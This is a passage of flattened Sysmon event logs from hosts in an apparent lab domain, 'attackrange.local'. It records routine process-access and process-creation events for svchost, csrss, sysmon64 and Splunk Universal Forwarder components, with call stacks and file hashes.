22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032698Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032697Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032696Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000359988Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.317{8e433fbf-36d0-6013-9503-000000001100}20602948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359987Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359986Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359985Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359984Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359983Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359982Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-0600-000000001100}756772C:\Windows\system32\csrss.exe{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000359981Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000359980Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.161{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000359998Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:33.192{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032713Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:34.351{FF16AF91-26B7-6013-0D00-00000000A401}10046532C:\Windows\system32\svchost.exe{FF16AF91-26E0-6013-8200-00000000A401}4736C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000360014Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360013Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360012Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360011Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360010Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360009Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-0600-000000001100}756772C:\Windows\system32\csrss.exe{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360008Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000360007Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.838{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000360006Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360005Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360004Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360003Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360002Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360001Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360000Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program 